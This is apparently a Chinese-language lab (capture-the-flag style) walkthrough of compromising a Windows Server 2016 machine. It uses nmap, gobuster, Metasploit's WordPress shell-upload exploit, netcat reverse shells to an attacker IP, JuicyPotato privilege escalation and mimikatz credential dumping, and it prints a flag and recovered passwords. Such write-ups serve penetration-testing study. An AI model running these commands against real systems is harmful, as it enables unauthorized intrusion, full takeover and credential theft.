4. hack之msfconsole

端口扫描

kali@kali:~$ nmap -p- --min-rate=1000 -T4 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 04:59 EDT
Nmap scan report for bogon (10.10.10.29)
Host is up (0.26s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql

gobuster下载安装并执行

$./gobuster dir -u http://10.10.10.29/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.29/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/10 06:17:10 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/08/10 06:19:12 Finished
===============================================================

通过msfconsole进入服务器

msfconsole
msf > use exploit/unix/webapp/wp_admin_shell_upload   
msf > set PASSWORD P@s5w0rd!
msf > set USERNAME admin
msf > set TARGETURI /wordpress
msf > set RHOSTS 10.10.10.29
msf > run  # 必须在exploit/unix/webapp/wp_admin_shell_upload该目录下

将netcat二进制文件上载到计算机以获得更稳定的外壳

  • 打开vbox虚拟机某目录
lcd /usr/share/windows-resources/binaries/
  • 打开10.10.10.29某目录
cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
  • 上传/usr/share/windows-resources/binaries/nc.exe文件
upload nc.exe

如果上传失败,可能已存在

  • vbox虚拟机监听端口1234
nc -lvp 1234
  • msf 连接 vbox 1234端口
msf > execute -f nc.exe -a "-e cmd.exe 10.10.14.4 1234"

  • 在vbox虚机nc -lvp 1234可正常执行命令操作10.10.10.29

权限提升

判断10.10.10.29的系统

meterpreter > sysinfo
Computer    : SHIELD
OS          : Windows NT SHIELD 10.0 build 14393 (Windows Server 2016) i586
Meterpreter : php/windows

发现Windows Server 2016操作系统,容易受到Rotten Potato攻击

Juicy Potato

Juicy Potato是该漏洞利用程序的一种变体,它通过利用MiTM攻击中的BITS和SeAssignPrimaryToken或SeImpersonate特权,允许Windows上的服务帐户升级为SYSTEM(最高特权)。
我们可以通过上传Juicy Potato二进制文件并执行它来利用它。和以前一样,我们可以使用meterpreter shell进行上传,然后可以使用netcat shell执行漏洞利用。

upload JuicyPotato.exe
  • 在nc容口中向windows上创建批处理文件
echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.4 1111 > shell.bat
  • 在vbox启动另一个nc窗口
nc -lvp 1111

  • 执行JuicyPotato.exe
JuicyPotato.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337

  • 在nc 1111窗口中执行whoami
PS C:\Windows\system32> whoami
whoami
nt authority\system

发现已经是管理员

  • 获取C:\Users\Administrator\Desktop\root.txt文件内容
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
6e9a9fdc6f64e410a68b847bb4b404fa

通过mimikatz获取其它密码

下载mimikatz.exe并在meterpreter中通过upload上传至window

在管理权限控制台中执行./mimikatz.exe

在mimikatz中执行sekurlsa::logonpasswords

获取到账号及密码sandra/Password1234!